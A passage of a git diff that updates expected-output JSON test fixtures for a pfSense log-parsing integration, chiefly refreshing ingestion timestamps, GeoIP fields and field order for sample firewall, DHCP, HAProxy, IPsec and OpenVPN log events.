43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1825,7 +1745,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709528Z", + "ingested": "2021-12-14T14:54:09.821732867Z", "original": "\u003c134\u003eJul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,175.16.199.1,request,37728,164", "provider": "filterlog", "timezone": "-04:00", @@ -1906,7 +1826,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709534300Z", + "ingested": "2021-12-14T14:54:09.821733253Z", "original": "\u003c134\u003eJul 4 11:10:54 filterlog[72237]: 199,,,1557957510,igb1.15,match,pass,in,4,0x0,,64,0,0,DF,1,icmp,84,10.100.15.13,10.100.15.1,request,0,064", "provider": "filterlog", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json index d1a5388bef7..02f2b2c8f35 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json @@ -43,7 +43,7 @@ "mac": "4c:55:41:a0:fa:99" }, "event": { - "ingested": "2021-12-09T13:44:38.896609700Z", + "ingested": "2021-12-14T14:54:13.008882527Z", "original": "\u003c190\u003eJul 4 09:39:40 dhcpd[64305]: DHCPDISCOVER from 4c:55:41:a0:fa:99 via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -117,7 +117,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-12-09T13:44:38.896618700Z", + "ingested": "2021-12-14T14:54:13.008885224Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPOFFER on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -197,7 +197,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-12-09T13:44:38.896624700Z", + "ingested": "2021-12-14T14:54:13.008892896Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPREQUEST for 10.150.60.56 (10.150.60.1) from 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -271,7 +271,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-12-09T13:44:38.896629Z", + "ingested": "2021-12-14T14:54:13.008893313Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPACK on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json index dae9e7bb277..a13c10a85fc 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json @@ -71,7 +71,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-12-09T13:44:39.410311Z", + "ingested": "2021-12-14T14:54:13.571250684Z", "original": "\u003c134\u003eAug 15 16:15:18 haproxy[41476]: 10.87.93.55:59607 [15/Aug/2021:16:15:18.502] TestFrontend~ TestBackend/TestServer 0/0/0/2/2 400 182 - - ---- 2/2/0/1/0 0/0 \"GET /favicon.ico HTTP/1.1\" ", "provider": "haproxy", "timezone": "-04:00", @@ -153,7 +153,7 @@ }, "event": { "duration": 3000000, - "ingested": "2021-12-09T13:44:39.410319600Z", + "ingested": "2021-12-14T14:54:13.571253591Z", "original": "\u003c134\u003eAug 15 16:17:18 haproxy[41476]: 10.87.93.55:59607 [15/Aug/2021:16:15:18.407] TestFrontend~ TestBackend/TestServer 0/0/0/3/3 400 182 - - ---- 2/2/0/1/0 0/0 \"GET /login HTTP/1.1\" ", "provider": "haproxy", "timezone": "-04:00", @@ -227,7 +227,7 @@ }, "event": { "duration": 30014000000, - "ingested": "2021-12-09T13:44:39.410325100Z", + "ingested": "2021-12-14T14:54:13.571254037Z", "original": "\u003c134\u003eAug 15 16:18:40 haproxy[41476]: 10.87.93.55:58722 [15/Aug/2021:16:15:10.549] TestFrontend~ TestBackend/\u003cNOSRV\u003e -1/-1/-1/-1/30014 408 212 - - cR-- 2/2/0/0/0 0/0 \"\u003cBADREQ\u003e\" ", "provider": "haproxy", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json index 131d6edf6d4..348ea268d1e 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json @@ -14,7 +14,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878248400Z", + "ingested": "2021-12-14T14:54:14.098011167Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547105-05:00 pfSense.example.com charon 18610 - - 08[CFG] ppk_id = (null)", "provider": "charon", "timezone": "-05:00", @@ -46,7 +46,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878257Z", + "ingested": "2021-12-14T14:54:14.098013633Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547109-05:00 pfSense.example.com charon 18610 - - 08[CFG] ppk_required = 0", "provider": "charon", "timezone": "-05:00", @@ -78,7 +78,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878262700Z", + "ingested": "2021-12-14T14:54:14.098014058Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547113-05:00 pfSense.example.com charon 18610 - - 08[CFG] mobike = 1", "provider": "charon", "timezone": "-05:00", @@ -110,7 +110,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878268200Z", + "ingested": "2021-12-14T14:54:14.098014418Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547117-05:00 pfSense.example.com charon 18610 - - 08[CFG] aggressive = 0", "provider": "charon", "timezone": "-05:00", @@ -142,7 +142,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878273600Z", + "ingested": "2021-12-14T14:54:14.098014787Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547122-05:00 pfSense.example.com charon 18610 - - 08[CFG] dscp = 0x00", "provider": "charon", "timezone": "-05:00", @@ -174,7 +174,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878279Z", + "ingested": "2021-12-14T14:54:14.098015147Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547126-05:00 pfSense.example.com charon 18610 - - 08[CFG] encap = 0", "provider": "charon", "timezone": "-05:00", @@ -206,7 +206,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878284400Z", + "ingested": "2021-12-14T14:54:14.098015514Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547130-05:00 pfSense.example.com charon 18610 - - 08[CFG] dpd_delay = 0", "provider": "charon", "timezone": "-05:00", @@ -238,7 +238,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878289900Z", + "ingested": "2021-12-14T14:54:14.098015884Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547207-05:00 pfSense.example.com charon 18610 - - 08[CFG] if_id_in = 0", "provider": "charon", "timezone": "-05:00", @@ -270,7 +270,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878295400Z", + "ingested": "2021-12-14T14:54:14.098016250Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547211-05:00 pfSense.example.com charon 18610 - - 08[CFG] if_id_out = 0", "provider": "charon", "timezone": "-05:00", @@ -302,7 +302,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878300700Z", + "ingested": "2021-12-14T14:54:14.098016612Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547215-05:00 pfSense.example.com charon 18610 - - 08[CFG] local:", "provider": "charon", "timezone": "-05:00", @@ -334,7 +334,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878306Z", + "ingested": "2021-12-14T14:54:14.098016955Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547220-05:00 pfSense.example.com charon 18610 - - 08[CFG] remote:", "provider": "charon", "timezone": "-05:00", @@ -366,7 +366,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878311800Z", + "ingested": "2021-12-14T14:54:14.098017658Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547245-05:00 pfSense.example.com charon 18610 - - 08[CFG] updated vici connection: bypass", "provider": "charon", "timezone": "-05:00", @@ -398,7 +398,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878317300Z", + "ingested": "2021-12-14T14:54:14.098018020Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547376-05:00 pfSense.example.com charon 18610 - - 07[CFG] vici client 84 requests: load-conn", "provider": "charon", "timezone": "-05:00", @@ -430,7 +430,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878322700Z", + "ingested": "2021-12-14T14:54:14.098018372Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547385-05:00 pfSense.example.com charon 18610 - - 07[CFG] conn con1000:", "provider": "charon", "timezone": "-05:00", @@ -462,7 +462,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878328Z", + "ingested": "2021-12-14T14:54:14.098018727Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547451-05:00 pfSense.example.com charon 18610 - - 07[CFG] child con1000:", "provider": "charon", "timezone": "-05:00", @@ -494,7 +494,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878333500Z", + "ingested": "2021-12-14T14:54:14.098019079Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547457-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_time = 3240", "provider": "charon", "timezone": "-05:00", @@ -526,7 +526,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878339Z", + "ingested": "2021-12-14T14:54:14.098019564Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547461-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_time = 3600", "provider": "charon", "timezone": "-05:00", @@ -558,7 +558,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878344400Z", + "ingested": "2021-12-14T14:54:14.098019914Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547465-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_time = 360", "provider": "charon", "timezone": "-05:00", @@ -590,7 +590,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878349800Z", + "ingested": "2021-12-14T14:54:14.098020263Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547469-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_bytes = 0", "provider": "charon", "timezone": "-05:00", @@ -622,7 +622,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878355200Z", + "ingested": "2021-12-14T14:54:14.098020620Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547473-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_bytes = 0", "provider": "charon", "timezone": "-05:00", @@ -654,7 +654,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878360600Z", + "ingested": "2021-12-14T14:54:14.098020969Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547477-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_bytes = 0", "provider": "charon", "timezone": "-05:00", @@ -686,7 +686,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878365900Z", + "ingested": "2021-12-14T14:54:14.098021324Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547481-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -718,7 +718,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878371300Z", + "ingested": "2021-12-14T14:54:14.098021676Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547485-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -750,7 +750,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878376900Z", + "ingested": "2021-12-14T14:54:14.098022125Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547489-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -777,19 +777,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -799,19 +794,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -839,7 +829,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:39.878382400Z", + "ingested": "2021-12-14T14:54:14.098022477Z", "original": "\u003c30\u003e1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] \u003ccon1000|11\u003e sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes)", "provider": "charon", "timezone": "-05:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json index 8e165c1184f..55f418fa5b5 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json @@ -1,23 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" - }, - "message": "10.170.120.149:37849 peer info: IV_VER=3.git:released:662eae9a:Release", - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "openvpn" - }, "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -32,8 +15,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_VER=3.git:released:662eae9a:Release", "event": { - "ingested": "2021-12-09T13:44:41.123205100Z", + "ingested": "2021-12-14T14:54:15.405641759Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_VER=3.git:released:662eae9a:Release", "provider": "openvpn", "timezone": "-04:00", @@ -45,26 +39,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 peer info: IV_PLAT=android", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -79,8 +62,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_PLAT=android", "event": { - "ingested": "2021-12-09T13:44:41.123224800Z", + "ingested": "2021-12-14T14:54:15.405644404Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_PLAT=android", "provider": "openvpn", "timezone": "-04:00", @@ -92,26 +86,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" - }, - "message": "10.170.120.149:37849 peer info: IV_NCP=2", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -126,8 +109,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_NCP=2", "event": { - "ingested": "2021-12-09T13:44:41.123247400Z", + "ingested": "2021-12-14T14:54:15.405644850Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_NCP=2", "provider": "openvpn", "timezone": "-04:00", @@ -139,26 +133,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 peer info: IV_TCPNL=1", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -173,8 +156,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_TCPNL=1", "event": { - "ingested": "2021-12-09T13:44:41.123253200Z", + "ingested": "2021-12-14T14:54:15.405645219Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_TCPNL=1", "provider": "openvpn", "timezone": "-04:00", @@ -186,26 +180,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 peer info: IV_GUI_VER=net.openvpn.connect.android_3.2.4-5891", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -220,8 +203,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_GUI_VER=net.openvpn.connect.android_3.2.4-5891", "event": { - "ingested": "2021-12-09T13:44:41.123258500Z", + "ingested": "2021-12-14T14:54:15.405645574Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_GUI_VER=net.openvpn.connect.android_3.2.4-5891", "provider": "openvpn", "timezone": "-04:00", @@ -233,26 +227,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" - }, - "message": "10.170.120.149:37849 peer info: IV_PROTO=2", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -267,8 +250,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_PROTO=2", "event": { - "ingested": "2021-12-09T13:44:41.123264100Z", + "ingested": "2021-12-14T14:54:15.405645966Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_PROTO=2", "provider": "openvpn", "timezone": "-04:00", @@ -280,26 +274,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 peer info: IV_SSO=openurl", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -314,8 +297,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_SSO=openurl", "event": { - "ingested": "2021-12-09T13:44:41.123269400Z", + "ingested": "2021-12-14T14:54:15.405646319Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_SSO=openurl", "provider": "openvpn", "timezone": "-04:00", @@ -327,26 +321,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -356,8 +339,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849", "event": { - "ingested": "2021-12-09T13:44:41.123274700Z", + "ingested": "2021-12-14T14:54:15.405646687Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849", "provider": "openvpn", "timezone": "-04:00", @@ -373,6 +367,12 @@ }, "user": { "name": "bob" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "openvpn" } }, { @@ -386,7 +386,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:41.123280Z", + "ingested": "2021-12-14T14:54:15.405647040Z", "original": "\u003c37\u003eJul 3 21:42:57 openvpn[19830]: user 'bob' authenticated", "provider": "openvpn", "timezone": "-04:00", @@ -409,6 +409,16 @@ } }, { + "@timestamp": "2021-07-03T21:42:57.000-04:00", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.170.120.149", + "10.170.170.2" + ] + }, "log": { "syslog": { "priority": 29 @@ -423,24 +433,8 @@ "ip": "10.170.120.149" }, "message": "bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled)", - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "openvpn" - }, - "@timestamp": "2021-07-03T21:42:57.000-04:00", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.170.120.149", - "10.170.170.2" - ] - }, "event": { - "ingested": "2021-12-09T13:44:41.123283900Z", + "ingested": "2021-12-14T14:54:15.405647399Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled)", "provider": "openvpn", "timezone": "-04:00", @@ -455,9 +449,27 @@ }, "user": { "name": "bob" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "openvpn" } }, { + "observer": { + "name": "pfSense.example.com" + }, + "@timestamp": "2021-07-04T03:17:01.074Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1" + ] + }, "log": { "syslog": { "priority": 27 @@ -466,19 +478,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -486,26 +493,8 @@ "ip": "175.16.199.1" }, "message": "TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745", - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "openvpn" - }, - "observer": { - "name": "pfSense.example.com" - }, - "@timestamp": "2021-07-04T03:17:01.074Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1" - ] - }, "event": { - "ingested": "2021-12-09T13:44:41.123288200Z", + "ingested": "2021-12-14T14:54:15.405647756Z", "original": "\u003c27\u003e1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745", "provider": "openvpn", "timezone": "-05:00", @@ -518,6 +507,12 @@ "connection", "error" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "openvpn" } }, { @@ -533,9 +528,8 @@ "priority": 36 } }, - "message": "user 'bob' could not authenticate.", "event": { - "ingested": "2021-12-09T13:44:41.123293100Z", + "ingested": "2021-12-14T14:54:15.405648305Z", "original": "\u003c36\u003e1 2021-07-03T22:40:38.477134-05:00 pfSense.example.com openvpn 68813 - - user 'bob' could not authenticate.", "provider": "openvpn", "timezone": "-05:00", @@ -549,6 +543,7 @@ "error" ] }, + "message": "user 'bob' could not authenticate.", "user": { "name": "bob" }, diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json index dbea9bd7326..8cdf4344b0d 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json @@ -9,19 +9,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -92,7 +87,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068506700Z", + "ingested": "2021-12-14T14:54:16.421205949Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -117,19 +112,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -200,7 +190,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068515300Z", + "ingested": "2021-12-14T14:54:16.421210832Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -282,7 +272,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068520900Z", + "ingested": "2021-12-14T14:54:16.421211348Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578333-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,63,29559,0,DF,17,udp,69,10.170.27.50,10.170.27.1,52797,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -307,19 +297,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -390,7 +375,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068526200Z", + "ingested": "2021-12-14T14:54:16.421211808Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 